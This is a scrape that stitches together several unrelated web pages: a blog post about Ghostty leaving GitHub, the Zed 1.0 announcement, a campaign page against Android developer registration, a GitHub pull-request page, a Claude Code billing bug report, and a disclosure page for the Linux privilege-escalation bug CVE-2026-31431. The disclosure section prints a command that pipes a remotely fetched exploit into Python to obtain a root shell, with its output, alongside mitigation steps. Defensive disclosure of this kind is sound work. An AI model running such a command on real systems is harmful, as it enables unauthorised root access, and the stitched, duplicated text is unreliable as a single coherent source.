Writing this makes me ir­ra­tionally sad, but Ghostty will be leav­ing GitHub1.

I’m GitHub user 1299, joined Feb 2008.

Since then, I’ve opened GitHub every sin­gle day. Every day, mul­ti­ple times per

day, for over 18 years. Over half my life. A hand­ful of ex­cep­tions in there

(I’d love to see the data), but I can’t imag­ine more than a week per year.

GitHub is the place that has made me the most happy. I al­ways made time for

it. When I went through tough breakups? I lost my­self in open source… on

GitHub. During col­lege at 4 AM when every­one is passed out? Let me get one

com­mit in. During my hon­ey­moon while my wife is still asleep? Yeah, GitHub.

It’s where I’ve his­tor­i­cally been hap­pi­est and wanted to be.

Even the an­noy­ing stuff! Some peo­ple doom scroll so­cial me­dia. I’ve been doom

scrolling GitHub is­sues since be­fore that was a word. On va­ca­tions I’d have

book­marks of dif­fer­ent pro­jects on GitHub I wanted to study. Not just source

code, but OSS processes, how other main­tain­ers re­act to dif­fi­cult sit­u­a­tions.

Etc. Believe it or not, I like this.

Some might call this sick, but my hobby and work and pas­sion all align and for

most of my life they got to also live in one place on the in­ter­net: GitHub.

Did you know I started Vagrant (my first suc­cess­ful open source pro­ject) in

large part be­cause I hoped it would get me a job at GitHub? It’s no se­cret,

I’ve said this re­peat­edly, and in my first pub­lic talk about Vagrant, when I

was a mere 20 years old, I joked “maybe GitHub will hire me if it’s good!”

GitHub was my dream job. I did­n’t ever get to work there (not their fault).

But it was the per­fect place I wanted to be. The en­gi­neers were in­cred­i­ble,

the prod­uct was in­cred­i­ble, and it was some­thing I lived and breathed every

day. I still do and con­sis­tently have… for these 18 years. Enough time for

an en­tire hu­man to be­come an adult, all on GitHub.

Lately, I’ve been very pub­licly crit­i­cal of GitHub. I’ve been mean about it.

I’ve been an­gry about it. I’ve hurt peo­ple’s feel­ings. I’ve been lash­ing out.

Because GitHub is fail­ing me, every sin­gle day, and it is per­sonal. It is

ir­ra­tionally per­sonal. I love GitHub more than a per­son should love a thing,

and I’m mad at it. I’m sorry about the hurt feel­ings to the peo­ple work­ing on

it.

I’ve felt this way for a long time, but for the past month I’ve kept a jour­nal

where I put an “X” next to every date where a GitHub out­age has neg­a­tively

im­pacted my abil­ity to work2. Almost every day has an X. On the day I am

writ­ing this post, I’ve been un­able to do any PR re­view for ~2 hours be­cause

there is a GitHub Actions out­age3. This is no longer a place for se­ri­ous

work if it just blocks you out for hours per day, every day.

It’s not a fun place for me to be any­more. I want to be there but it does­n’t

want me to be there. I want to get work done and it does­n’t want me to get

work done. I want to ship soft­ware and it does­n’t want me to ship soft­ware.

I want it to be bet­ter, but I also want to code. And I can’t code with GitHub

any­more. I’m sorry. After 18 years, I’ve got to go. I’d love to come back one

day, but this will have to be pred­i­cated on real re­sults and im­prove­ments,

not words and promises.

I’ll share more de­tails about where the Ghostty pro­ject will be mov­ing to in

the com­ing months. We have a plan but I’m also very much still in dis­cus­sions

with mul­ti­ple providers (both com­mer­cial and FOSS).

It’ll take us time to re­move all of our de­pen­den­cies on GitHub and we have a

plan in place to do it as in­cre­men­tally as pos­si­ble. We plan on keep­ing a

read-only mir­ror avail­able on GitHub at the cur­rent URL.

My per­sonal pro­jects and other work will re­main on GitHub for now.

Ghostty is where I, our main­tain­ers, and our open source com­mu­nity are

most im­pacted so that is the fo­cus of this change. We’ll see where it

goes af­ter that.

Footnotes

The tim­ing of this is co­in­ci­den­tal with the large out­age on April 27, 2026.

We’ve been dis­cussing and putting to­gether a plan to leave GitHub

for months, and this blog post was writ­ten over a week ago. We only

made the fi­nal de­ci­sion this week. ↩

The tim­ing of this is co­in­ci­den­tal with the large out­age on April 27, 2026.

We’ve been dis­cussing and putting to­gether a plan to leave GitHub

for months, and this blog post was writ­ten over a week ago. We only

made the fi­nal de­ci­sion this week. ↩

To the “Git is dis­trib­uted!” crowd: the is­sue is­n’t Git, it’s the

in­fra­struc­ture we rely on around it: is­sues, PRs, Actions, etc. ↩

To the “Git is dis­trib­uted!” crowd: the is­sue is­n’t Git, it’s the

in­fra­struc­ture we rely on around it: is­sues, PRs, Actions, etc. ↩

This is not the large Elasticsearch out­age they had on April 27, 2026.

This blog post was writ­ten a week be­fore that, so this was a dif­fer­ent

out­age. ↩

This is not the large Elasticsearch out­age they had on April 27, 2026.

This blog post was writ­ten a week be­fore that, so this was a dif­fer­ent

out­age. ↩

April 29th, 2026

To cre­ate a fun­da­men­tally bet­ter ed­i­tor, we had to in­vent a new ap­proach to build­ing desk­top soft­ware. Our pre­vi­ous ed­i­tor, Atom, was built as a fork of Chromium, spawn­ing the Electron frame­work in the process. Electron even­tu­ally be­came the foun­da­tion of VS Code (which to­day seems to be forked into a new AI code ed­i­tor every other week). Web tech­nol­ogy of­fered an easy path to ship­ping flex­i­ble soft­ware, but it also im­posed a ceil­ing. No mat­ter how hard we worked, we could­n’t make Atom bet­ter than the plat­form it was built on.

So we started over. Instead of build­ing Zed like a web page, we built it like a video game, or­ga­niz­ing the en­tire ap­pli­ca­tion around feed­ing data to shaders run­ning on the GPU. That meant writ­ing our own UI frame­work, GPUI, from scratch in Rust.

Owning every layer of our stack lets us take Zed places that no one build­ing on bor­rowed foun­da­tions can go, but we knew from the be­gin­ning that it was­n’t go­ing to be an easy path. Thanks to years of hard work by our team and com­mu­nity, Zed is closer than ever to that ideal tool we set out to cre­ate. We’ve added a ton of ca­pa­bil­i­ties while re­main­ing true to our core ethos of craft and per­for­mance, and hun­dreds of thou­sands of de­vel­op­ers now rely on Zed to ship soft­ware each day. That’s part of what gives us the con­fi­dence to de­clare ver­sion 1.0.

What 1.0 Means

Developers ex­pect a mod­ern ed­i­tor to sup­port dozens of lan­guages and their ecosys­tems, end­less vari­a­tions and edge cases across every stack: Git in­te­gra­tion, SSH re­mot­ing, a Debugger, and, yes, rain­bow brack­ets. We’ve spent five years build­ing that sur­face area across Mac, Windows, and Linux, ex­ceed­ing a mil­lion lines of code.

Zed is also an AI-native ed­i­tor. You can run mul­ti­ple agents in par­al­lel, and edit pre­dic­tions sug­gest your next change at key­stroke gran­u­lar­ity and with the speed you’ve come to ex­pect from Zed. The Agent Client Protocol opens Zed up to a grow­ing num­ber of the best agents out there, in­clud­ing Claude Agent, Codex, OpenCode, and more re­cently Cursor. We built AI into our ed­i­tor’s foun­da­tion in­stead of bolt­ing it on top.

We’re also launch­ing Zed for Business. Companies have been ask­ing us for a way to roll out Zed to their en­gi­neer­ing teams, and very soon they can, with cen­tral­ized billing, role-based ac­cess con­trols, and team man­age­ment.

1.0 does­n’t mean “done”. It also does­n’t mean “perfect”. It means we’ve reached a tip­ping point where most de­vel­op­ers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced be­cause some­thing was miss­ing, 1.0 is our in­vi­ta­tion to try again. Zed is more ca­pa­ble than it’s ever been, and still more per­for­mant.

Where We’re Going

Our vi­sion has­n’t changed since we started: we’re build­ing the most per­for­mant and col­lab­o­ra­tive cod­ing en­vi­ron­ment. What’s changed is what col­lab­o­ra­tion means while cre­at­ing soft­ware. It used to mean hu­mans work­ing to­gether in real time. Now it means hu­mans and AI agents, work­ing in the same space, on the same code.

Building our own foun­da­tions is what got us to 1.0, and it’s also what makes the next chap­ter pos­si­ble. We’re ac­tively de­vel­op­ing DeltaDB, a syn­chro­niza­tion en­gine built on CRDTs that tracks every change with char­ac­ter-level gran­u­lar­ity. DeltaDB lets mul­ti­ple hu­mans and agents share a sin­gle, con­sis­tent view of the code­base as it evolves. DeltaDB will al­low you to in­vite team­mates into con­ver­sa­tions with agents to re­view and evolve agen­tic code di­rectly in the con­text from which it’s gen­er­ated.

This vi­sion de­pends on deep own­er­ship of our fun­da­men­tal prim­i­tives. It’s not an ex­pe­ri­ence we’d be able to ship in­side of some­one else’s browser en­gine.

A Milestone, Not a Finish Line

We’ve shipped over a thou­sand ver­sions of Zed, but all of them be­gan with zero. Today, that changes.

We’ll keep ship­ping every week, the way we al­ways have. The list of things to build will never end, and that’s ex­actly how we like it. Each re­lease moves the craft for­ward.

If you want to try Zed, down­load now. If you want to help us build it, join us!

Related Posts

Check out sim­i­lar blogs from the Zed team.

Looking for a bet­ter ed­i­tor?

You can try Zed to­day on ma­cOS, Windows, or Linux. Download now!

We are hir­ing!

If you’re pas­sion­ate about the top­ics we cover on our blog, please con­sider join­ing our team to help us ship the fu­ture of soft­ware de­vel­op­ment.

Your phone is about to stop be­ing yours.

124 days un­til lock­down

Starting September 2026, a silent up­date, non­con­sen­su­ally pushed by Google, will block every Android app whose de­vel­oper has­n’t reg­is­tered with Google, signed their con­tract, paid up, and handed over gov­ern­ment ID.

Every app and every de­vice, world­wide, with no opt-out.

Post on X Post on Mastodon Post on Bluesky LinkedIn Facebook

What Google is do­ing

In August 2025, Google an­nounced a new re­quire­ment: start­ing September 2026, every Android app de­vel­oper must reg­is­ter cen­trally with Google be­fore their soft­ware can be in­stalled on any de­vice. Not just Play Store apps: all apps. This in­cludes apps shared be­tween friends, dis­trib­uted through F-Droid, built by hob­by­ists for per­sonal use. Independent de­vel­op­ers, church and com­mu­nity groups, and hob­by­ists alike will all be frozen out of be­ing able to de­velop and dis­trib­ute their soft­ware.

Registration re­quires:

Paying a fee to Google

Agreeing to Google’s Terms and Conditions

Surrendering your gov­ern­ment-is­sued iden­ti­fi­ca­tion

Providing ev­i­dence of your pri­vate sign­ing key

Listing all cur­rent and all fu­ture ap­pli­ca­tion iden­ti­fiers

If a de­vel­oper does not com­ply, their apps get silently blocked on every Android de­vice world­wide.

Who this hurts

You

You bought an Android phone be­cause Google told you it was open. You could in­stall what you wanted, and that was the deal.

Google is now rewrit­ing that deal, retroac­tively, on hard­ware you al­ready own. After the up­date lands, you can only run soft­ware that Google has pre-ap­proved. On your phone: your prop­erty, that you paid for.

Independent de­vel­op­ers

A teenager’s first app, a vol­un­teer’s pri­vacy tool, or a com­pa­ny’s con­fi­den­tial in­ter­nal beta. It does­n’t mat­ter. After September 2026, none of these can be in­stalled with­out Google’s bless­ing.

F-Droid, home to thou­sands of free and open-source Android apps, has called this an “existential” threat. Cory Doctorow calls it “Darth Android”.

Governments & civil so­ci­ety

Google has a doc­u­mented track record of com­ply­ing when au­thor­i­tar­ian regimes de­mand app re­movals. With this pro­gram, the soft­ware that runs your coun­try’s in­sti­tu­tions will ex­ist at the plea­sure of a sin­gle un­ac­count­able for­eign cor­po­ra­tion.

The EFF calls app gate­keep­ing “an ever-ex­pand­ing path­way to in­ter­net cen­sor­ship.”

Google’s “escape hatch” is a trap door

Google says “power users” can “still in­stall” un­ver­i­fied apps. Here’s what that ac­tu­ally looks like:

Delve into System Settings, find Developer Options

Tap the build num­ber seven times to en­able Developer Mode

Dismiss scare screens about co­er­cion

Enter your PIN

Restart the de­vice

Wait 24 hours

Come back, dis­miss more scare screens

Pick “allow tem­porar­ily” (7 days) or “allow in­def­i­nitely”

Confirm, again, that you un­der­stand “the risks”

Nine steps. A manda­tory 24-hour cool­ing-off pe­riod. For in­stalling soft­ware on a de­vice you own.

Worse: this flow runs en­tirely through Google Play Services, not the Android OS. Google can change it, tighten it, or kill it at any time, with no OS up­date re­quired and no con­sent needed. And as of to­day, it has­n’t shipped in any beta, pre­view, or ca­nary build. It ex­ists only as a blog post and some mock­ups.

This is big­ger than Android

If Google can retroac­tively lock down bil­lions of de­vices that were sold as open plat­forms, every hard­ware man­u­fac­turer on the planet is watch­ing.

The prin­ci­ple be­ing es­tab­lished: the com­pany that made your de­vice gets to de­cide, af­ter you’ve bought it, what soft­ware you’re al­lowed to run. In soft­ware, this is called a “rug pull”; but at least you could al­ways in­stall com­pet­ing soft­ware. In hard­ware, it is a fait ac­com­pli that strips you of your agency and ren­ders you pow­er­less to the whims of a sin­gle un­ac­count­able gate­keeper and con­victed mo­nop­o­list.

Android’s open­ness was never just a fea­ture. It was the promise that dis­tin­guished it from iPhone. Millions chose Android for ex­actly that rea­son. Google is now re­vok­ing that promise uni­lat­er­ally, on de­vices al­ready in peo­ple’s pock­ets, be­cause they’ve de­cided they have enough mar­ket dom­i­nance and reg­u­la­tory cap­ture to get away with it.

Ars Technica: “Google’s Apple envy threat­ens to dis­man­tle Android’s open legacy.”

But wait, is­n’t this…

″…just about se­cu­rity?”

The se­cu­rity ra­tio­nale is a smoke­screen. Google Play Protect al­ready scans for mal­ware in­de­pen­dent of de­vel­oper iden­tity. Requiring a gov­ern­ment ID does­n’t make code safer. It makes de­vel­op­ers iden­ti­fi­able and con­trol­lable. Malware au­thors can reg­is­ter. Indie de­vel­op­ers and dis­si­dents of­ten can’t. The EFF is blunt: iden­tity-based gate­keep­ing is a cen­sor­ship tool, not a se­cu­rity one.

″…still side­load­ing if you use the ad­vanced flow?”

Nine steps, 24-hour wait, buried in Developer Options, de­liv­ered through a pro­pri­etary ser­vice that Google can re­voke when­ever they want. That’s not side­load­ing. That’s a de­ter­rence mech­a­nism built to en­sure al­most no­body com­pletes it. And since it runs through Play Services rather than the OS, Google can tighten or kill it silently.

″…only a prob­lem if you have some­thing to hide?”

Whistleblowers, jour­nal­ists, and ac­tivists un­der au­thor­i­tar­ian gov­ern­ments will be the first vic­tims. People in do­mes­tic abuse sit­u­a­tions are next. All these groups have le­git­i­mate rea­sons to dis­trib­ute or use soft­ware with­out putting their le­gal iden­tity in a Google data­base. Anonymous open-source con­tri­bu­tion is a tra­di­tion older than Google it­self. This pol­icy ends it on Android.

″…the same thing Apple does?”

Apple has been a walled gar­den from day one. People chose Android be­cause it was dif­fer­ent. “Apple does it too” is a race to the bot­tom and a weak tu quoque ar­gu­ment. And un­der reg­u­la­tory pres­sure (the EU’s Digital Markets Act), even Apple is be­ing forced to open up. Google is mov­ing in the op­po­site di­rec­tion: at­tempt­ing to fur­ther en­trench its gate­keep­ing sta­tus.

″…just $25 and some pa­per­work?”

Maybe, if you’re a de­vel­oper in the US with a credit card and a dri­ver’s li­cense. Try be­ing a stu­dent in sub-Sa­ha­ran Africa, or a dis­si­dent in Myanmar, or a vol­un­teer main­tain­ing a com­mu­nity health app. The cost is­n’t only fi­nan­cial: you’re sur­ren­der­ing gov­ern­ment ID and ev­i­dence of your sign­ing keys to a com­pany that rou­tinely com­plies with gov­ern­ment de­mands to re­move apps and ex­pose de­vel­op­ers.

Fight back

Everyone

Install F-Droid on every Android de­vice you own. Alternative stores only sur­vive if peo­ple ac­tu­ally use them.

Contact your reg­u­la­tors. Regulators world­wide are gen­uinely con­cerned about mo­nop­o­lies and the cen­tral­iza­tion of power in the tech sec­tor, and want to hear di­rectly from in­di­vid­u­als who are af­fected and con­cerned.

Share this page. Link to keepan­droidopen.org every­where.

Push back on as­tro­turfers. The “well, ac­tu­ally…” crowd is out in force. Don’t let them set the nar­ra­tive.

Sign the change.org pe­ti­tion and join the over 100,000 sig­na­to­ries who have made their voices heard.

Read and share our open let­ter

Tell Google what you think of this through their own de­vel­oper ver­i­fi­ca­tion sur­vey (for all the good that will do).

Developers

Do not sign up. Don’t join the pro­gram by sign­ing up for the Android Developer Console and agree­ing to their ir­rev­o­ca­ble Terms and Conditions. Don’t ver­ify your iden­tity. Don’t play ball.

Google’s plan only works if de­vel­op­ers com­ply. Don’t.

Talk other de­vel­op­ers and or­ga­ni­za­tions out of sign­ing up.

Add the FreeDroidWarn li­brary to your apps to warn users.

Run a web­site? Add the count­down ban­ner.

Google em­ploy­ees

If you know some­thing about the pro­gram’s tech­ni­cal im­ple­men­ta­tion or in­ter­nal ra­tio­nale, con­tact tips@keepan­droidopen.org from a non-work ma­chine and a non-Gmail ac­count. Strict con­fi­dence guar­an­teed.

All those op­posed…

69 or­ga­ni­za­tions from 21 coun­tries have signed the open let­ter

Read the full open let­ter and thank the sig­na­to­ries →

What they’re say­ing

Tech press

“Google will ver­ify Android de­vel­op­ers dis­trib­ut­ing apps out­side the Play store” The Verge

“Google will ver­ify Android de­vel­op­ers dis­trib­ut­ing apps out­side the Play store”

“This will wipe out Android as an ac­tual al­ter­na­tive to Apple’s mo­bile OS of­fer­ings.” Hackaday

“This will wipe out Android as an ac­tual al­ter­na­tive to Apple’s mo­bile OS of­fer­ings.”

“Open let­ter warns manda­tory reg­is­tra­tion ‘threatens in­no­va­tion, com­pe­ti­tion, pri­vacy and user free­dom’” Infosecurity Magazine

“Open let­ter warns manda­tory reg­is­tra­tion ‘threatens in­no­va­tion, com­pe­ti­tion, pri­vacy and user free­dom’”

“Google is re­strict­ing one of Android’s most im­por­tant fea­tures, and users are out­raged” SlashGear

“Google is re­strict­ing one of Android’s most im­por­tant fea­tures, and users are out­raged”

“Keep Android Open — Abwehr gegen Verbot anonymer Apps von Google” heise on­line

“Keep Android Open — Abwehr gegen Verbot anonymer Apps von Google”

“Google’s dev reg­is­tra­tion plan ‘will end the F-Droid pro­ject’” The Register

“Google’s dev reg­is­tra­tion plan ‘will end the F-Droid pro­ject’”

“Keep Android Open” Linux Magazine

“Keep Android Open”

“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps” Android Headlines

“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps”

“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps” Android Headlines

“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps”

“Over 67 groups urge the com­pany to drop ID checks for apps dis­trib­uted out­side Play” The Register

“Over 67 groups urge the com­pany to drop ID checks for apps dis­trib­uted out­side Play”

“Android app store provider Aptoide hits Google with fresh law­suit al­leg­ing mo­nop­oly and an­ti­com­pet­i­tive choke­hold” Benzinga

“Android app store provider Aptoide hits Google with fresh law­suit al­leg­ing mo­nop­oly and an­ti­com­pet­i­tive choke­hold”

“Google will make you wait 24 hours to side­load Android apps” How-To Geek

“Google will make you wait 24 hours to side­load Android apps”

“Google will re­quire de­vel­oper ver­i­fi­ca­tion for Android apps out­side the Play Store” TechCrunch

Skip to con­tent

Navigation Menu

AI CODE CREATIONGitHub CopilotWrite bet­ter code with AIGitHub SparkBuild and de­ploy in­tel­li­gent apps­GitHub ModelsManage and com­pare promptsMCP RegistryNewIntegrate ex­ter­nal toolsView all fea­tures

AI CODE CREATIONGitHub CopilotWrite bet­ter code with AIGitHub SparkBuild and de­ploy in­tel­li­gent apps­GitHub ModelsManage and com­pare promptsMCP RegistryNewIntegrate ex­ter­nal tools

AI CODE CREATION

GitHub CopilotWrite bet­ter code with AI

GitHub CopilotWrite bet­ter code with AI

GitHub SparkBuild and de­ploy in­tel­li­gent apps

GitHub SparkBuild and de­ploy in­tel­li­gent apps

GitHub ModelsManage and com­pare prompts

GitHub ModelsManage and com­pare prompts

MCP RegistryNewIntegrate ex­ter­nal tools

MCP RegistryNewIntegrate ex­ter­nal tools

View all fea­tures

Pricing

Provide feed­back

Saved searches

Use saved searches to fil­ter your re­sults more quickly

Sign up

Appearance set­tings

Notifications

You must be signed in to change no­ti­fi­ca­tion set­tings

Fork

39.7k

Star

185k

Star

185k

Merged

Conversation

Pull re­quest overview

This PR changes the Git ex­ten­sion’s git.ad­dAICoAu­thor set­ting so that AI co-au­thor trail­ers are en­abled by de­fault, mak­ing the de­fault be­hav­ior au­to­mat­i­cally add a Co-authored-by trailer when AI-generated code con­tri­bu­tions are de­tected.

Changes:

Updates git.ad­dAICoAu­thor con­fig­u­ra­tion de­fault from “off” to “all”.

Copilot’s find­ings

Files re­viewed: 1/1 changed files

Comments gen­er­ated: 1

Screenshot Changes

Base: 3c1b53dd Current: eec3f9cf

Changed (3)

blocks-ci screen­shots changed

Replace the con­tents of test/​com­po­nent­Fix­tures/​blocks-ci-screen­shots.md with:

<!– auto-gen­er­ated by CI — do not edit man­u­ally –>

#### ed­i­tor/​codeEd­i­tor/​CodeEd­i­tor/​Dark


#### ed­i­tor/​codeEd­i­tor/​CodeEd­i­tor/​Light


NoiceBroice

ref­er­enced

this pull re­quest

in ThomasSnowden37/Harmoniq-Charts

Co-authored-by: Copilot <copi­lot@github.com>

Closed

srid

men­tioned this pull re­quest

Merged

Open

mi­crosoft

locked as spam and lim­ited con­ver­sa­tion to col­lab­o­ra­tors

Labels

None yet

CVE-2026 – 31431

100% re­li­able

every dis­tro since 2017

con­tainer es­cape prim­i­tive

732 bytes

found by Xint Code

Most Linux LPEs need a race win­dow or a ker­nel-spe­cific off­set.Copy Fail is a straight-line logic flaw — it needs nei­ther.The same 732-byte Python script roots every Linux dis­tri­b­u­tion shipped since 2017.

One logic bug in au­thencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently ex­ploitable for nearly a decade.

The demo

Same script, four dis­tri­b­u­tions, four root shells — in one take. The same ex­ploit bi­nary works un­mod­i­fied on every Linux dis­tri­b­u­tion.

tmux — copy fail demo

live

Who is af­fected

If your ker­nel was built be­tween 2017 and the patch — which cov­ers es­sen­tially every main­stream Linux dis­tri­b­u­tion — you’re in scope.

Copy Fail re­quires only an un­priv­i­leged lo­cal user ac­count — no net­work ac­cess, no ker­nel de­bug­ging fea­tures, no pre-in­stalled prim­i­tives. The ker­nel crypto API (AF_ALG) ships en­abled in es­sen­tially every main­stream dis­tro’s de­fault con­fig, so the en­tire 2017 → patch win­dow is in play out of the box.

Distributions we di­rectly ver­i­fied:

These are what we tested di­rectly. Other dis­tri­b­u­tions run­ning af­fected ker­nels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the em­bed­ded crowd — be­have the same. Tested it else­where? Open an is­sue to add to the list.

Should you patch first?

High

Multi-tenant Linux hosts

Shared dev boxes, shell-as-a-ser­vice, jump hosts, build servers — any­where mul­ti­ple users share a ker­nel.

any user be­comes root

High

Kubernetes / con­tainer clus­ters

The page cache is shared across the host. A pod with the right prim­i­tives com­pro­mises the node and crosses ten­ant bound­aries.

cross-con­tainer, cross-ten­ant

High

CI run­ners & build farms

GitHub Actions self-hosted run­ners, GitLab run­ners, Jenkins agents — any­thing that ex­e­cutes un­trusted PR code as a reg­u­lar user, on a shared ker­nel.

a PR be­comes root on the run­ner

High

Cloud SaaS run­ning user code

Notebook hosts, agent sand­boxes, server­less func­tions, any ten­ant-sup­plied con­tainer or script.

ten­ant be­comes host root

Medium

Standard Linux servers

Single-tenant pro­duc­tion where only your team has shell ac­cess.

in­ter­nal LPE; chains with web RCE or stolen creds

Lower

Single-user lap­tops & work­sta­tions

You’re al­ready the only user. The bug does­n’t grant re­mote at­tack­ers ac­cess by it­self, but any lo­cal code ex­e­cu­tion be­comes root.

post-ex­ploita­tion step-up

Exploit

The PoC is pub­lished so de­fend­ers can ver­ify their own sys­tems and val­i­date ven­dor patches.

Use re­spon­si­bly. Run only on sys­tems you own or have writ­ten au­tho­riza­tion to test. The script ed­its the page cache of a se­tuid bi­nary; the change is not per­sis­tent across re­boot, but the re­sult­ing root shell is real. Don’t run it on pro­duc­tion.

copy­_­fail_­exp.py 732 B

Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).Tar­gets /usr/bin/su by de­fault; pass an­other se­tuid bi­nary as argv[1].

sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952d­f05c719aa3911687f9

Quick run:

$ curl https://​copy.fail/​exp | python3 && su

# id

uid=0(root) gid=1002(user) groups=1002(user)

Issue tracker: https://​github.com/​the­ori-io/​copy-fail-CVE-2026 – 31431

Mitigation

Patch first. Update your dis­tri­b­u­tion’s ker­nel pack­age to one that in­cludes main­line com­mit a664bf3d603d — it re­verts the 2017 al­gif_aead in-place op­ti­miza­tion, so page-cache pages can no longer end up in the writable des­ti­na­tion scat­terlist. Most ma­jor dis­tri­b­u­tions are ship­ping the fix now.

Before you can patch: dis­able the al­gif_aead mod­ule.

# echo “install al­gif_aead /bin/false” > /etc/modprobe.d/disable-algif.conf

# rm­mod al­gif_aead

What does this break? For the vast ma­jor­ity of sys­tems — noth­ing mea­sur­able.

Will not af­fect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-ker­nel TLS, OpenSSL/GnuTLS/NSS de­fault builds, SSH, ker­nel keyring crypto. These all use the in-ker­nel crypto API di­rectly — they don’t go through AF_ALG.

May af­fect: user­space specif­i­cally con­fig­ured to use AF_ALG — e.g. OpenSSL with the afalg en­gine ex­plic­itly en­abled, some em­bed­ded crypto of­fload paths, or ap­pli­ca­tions that bind aead/​skci­pher/​hash sock­ets di­rectly. Check with lsof | grep AF_ALG or ss -xa if in doubt.

Performance: AF_ALG is a user­space front door to the ker­nel crypto API. Disabling it does not slow any­thing that was­n’t al­ready call­ing it; for the things that were, per­for­mance falls back to a nor­mal user­space crypto li­brary, which is what al­most every­thing else al­ready does.

For un­trusted work­loads (containers, sand­boxes, CI), block AF_ALG socket cre­ation via sec­comp re­gard­less of patch state.

FAQ

Loading FAQ…

Disclosure time­line

2026 – 03-23Reported to Linux ker­nel se­cu­rity team

2026 – 03-24Initial ac­knowl­edg­ment

2026 – 03-25Patches pro­posed and re­viewed

2026 – 04-01Patch com­mit­ted to main­line

2026 – 04-22CVE-2026 – 31431 as­signed

2026 – 04-29Public dis­clo­sure (https://​copy.fail/)

Xint Code

Is your soft­ware AI-era safe?

Copy Fail was sur­faced by Xint Code about an hour of scan time against the Linux crypto/ sub­sys­tem. Full root cause, di­a­grams, and the op­er­a­tor prompt that found it are in the Xint blog write-up.

The same scan also sur­faced other high-sever­ity bugs, still in co­or­di­nated dis­clo­sure. Xint Code au­dits pro­duc­tion code­bases the same way — one op­er­a­tor prompt, no har­ness­ing, pri­or­i­tized find­ings with trig­ger and im­pact nar­ra­tives.

Track record

0-day RCE

ZeroDay Cloud

Swept the data­base cat­e­gory — Redis, PostgreSQL, MariaDB. Zero hu­man in­ter­ven­tion.

Top 3

DARPA AIxCC

Finalist in the AI Cyber Challenge hosted by DoD DARPA.

9×

DEF CON CTF

Most-winning team in DEF CON CTF his­tory.

Summary

When a git repos­i­to­ry’s re­cent com­mit his­tory con­tains the case-sen­si­tive string HERMES.md, Claude Code routes API re­quests to “extra us­age” billing in­stead of the in­cluded Max plan quota. This silently burned through $200 in ex­tra us­age cred­its while my Max 20x plan ca­pac­ity re­mained largely un­touched (13% weekly us­age).

Environment

Claude Code v2.1.119

ma­cOS (Apple Silicon)

Max 20x plan ($200/month)

Model: claude-opus-4 – 6[1m] (also re­pro­duces with claude-opus-4 – 7)

Reproduction

Minimal re­pro­duc­tion — no pro­ject files needed:

# This FAILS with “out of ex­tra us­age” (routes to ex­tra us­age billing)

mkdir /tmp/test-fail && cd /tmp/test-fail

git init && echo test > test.txt && git add . && git com­mit -m “add HERMES.md”

claude -p “say hello” –model “claude-opus-4 – 6[1m]”

# => API Error: 400 “You’re out of ex­tra us­age…”

# This WORKS (routes to plan quota)

mkdir /tmp/test-pass && cd /tmp/test-pass

git init && echo test > test.txt && git add . && git com­mit -m “add her­mes.md”

claude -p “say hello” –model “claude-opus-4 – 6[1m]”

# => “Hello!”

# Cleanup

rm -rf /tmp/test-fail /tmp/test-pass

The trig­ger is the string HERMES.md in git com­mit mes­sages — not the pres­ence of a file with that name on disk. Claude Code in­cludes re­cent com­mits in its sys­tem prompt, and some­thing server-side routes the re­quest dif­fer­ently when this string is pre­sent.

What trig­gers it vs. what does­n’t

Impact

$200.98 in ex­tra us­age cred­its con­sumed for re­quests that should have been cov­ered by the in­cluded Max 20x plan quota

Multiple pro­jects be­came com­pletely un­us­able once ex­tra us­age was de­pleted, while the plan dash­board showed 86%+ re­main­ing weekly ca­pac­ity

The er­ror mes­sage (“out of ex­tra us­age”) gives no in­di­ca­tion that con­tent-based rout­ing is the cause, mak­ing this ex­tremely dif­fi­cult to di­ag­nose

Any user with HERMES.md in re­cent git com­mits would silently have their us­age billed to ex­tra cred­its

Expected be­hav­ior

API re­quest billing should not de­pend on the con­tent of git com­mit mes­sages in the sys­tem prompt. All re­quests from a Max plan sub­scriber should route to the in­cluded plan quota first.

How I found this

Systematic bi­nary search: cloning af­fected re­pos, test­ing or­phan branches, then iso­lat­ing in­di­vid­ual com­mit mes­sage strings un­til HERMES.md was iden­ti­fied as the ex­act trig­ger.

JavaScript is not avail­able. We’ve de­tected that JavaScript is dis­abled in this browser. Please en­able JavaScript or switch to a sup­ported browser to con­tinue us­ing x.com. You can see a list of sup­ported browsers in our Help Center.

Something went wrong, but don’t fret — let’s give it an­other shot.

Some pri­vacy re­lated ex­ten­sions may cause is­sues on x.com. Please dis­able them and try again.